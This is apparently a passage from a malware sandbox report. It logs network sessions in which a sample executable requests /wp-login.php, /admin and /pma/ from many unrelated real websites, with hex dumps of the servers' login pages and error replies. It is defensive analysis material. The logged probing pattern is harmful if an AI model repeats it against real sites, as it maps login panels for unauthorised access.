                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1378INData Raw: 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26
                                                                                                                                                                                                    Data Ascii: ={get passive(){return i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    339192.168.2.46423366.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC258OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC550INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://tra
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    340192.168.2.46423615.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC165OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC15911INData Raw: 37 39 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7969<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC15183INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 69 62 6c 69 6f 74
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/"> Bibliot


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    341192.168.2.46438745.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC856INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC7882INData Raw: 31 65 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1ec2<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC593INData Raw: 32 34 61 0d 0a 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 75 74 69 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 2e 32 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 39 38 32 35 38 33 39 63 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72
                                                                                                                                                                                                    Data Ascii: 24aipt' src='https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2' id='wp-util-js'></script><script type='text/javascript' id='user-profile-js-extra'>/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"f49825839c"};/* ... */</scr
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    342192.168.2.464473162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC527INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; securex-frame-options
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC841INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Staging for MyDirectLender.com &#8212; WordPress</title><meta name='robots' content='noindex, nofollow' /><scrip
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5794INData Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f
                                                                                                                                                                                                    Data Ascii: nk rel='stylesheet' id='forms-css' href='https://mydirectlender.com/wp-admin/css/forms.min.css?ver=6.4.1' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://mydirectlender.com/wp-admin/css/l10n.min.css?ver=6.4.1' type='text/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    343192.168.2.464311159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC173OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    344192.168.2.4641023.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC218INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:42 GMTServer: ApacheLocation: https://www.knu.ac.in/wp-login.phpContent-Length: 302Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC302INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/wp-login.php">here</a>.</p><hr><address>Apache Server


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    345192.168.2.464229172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
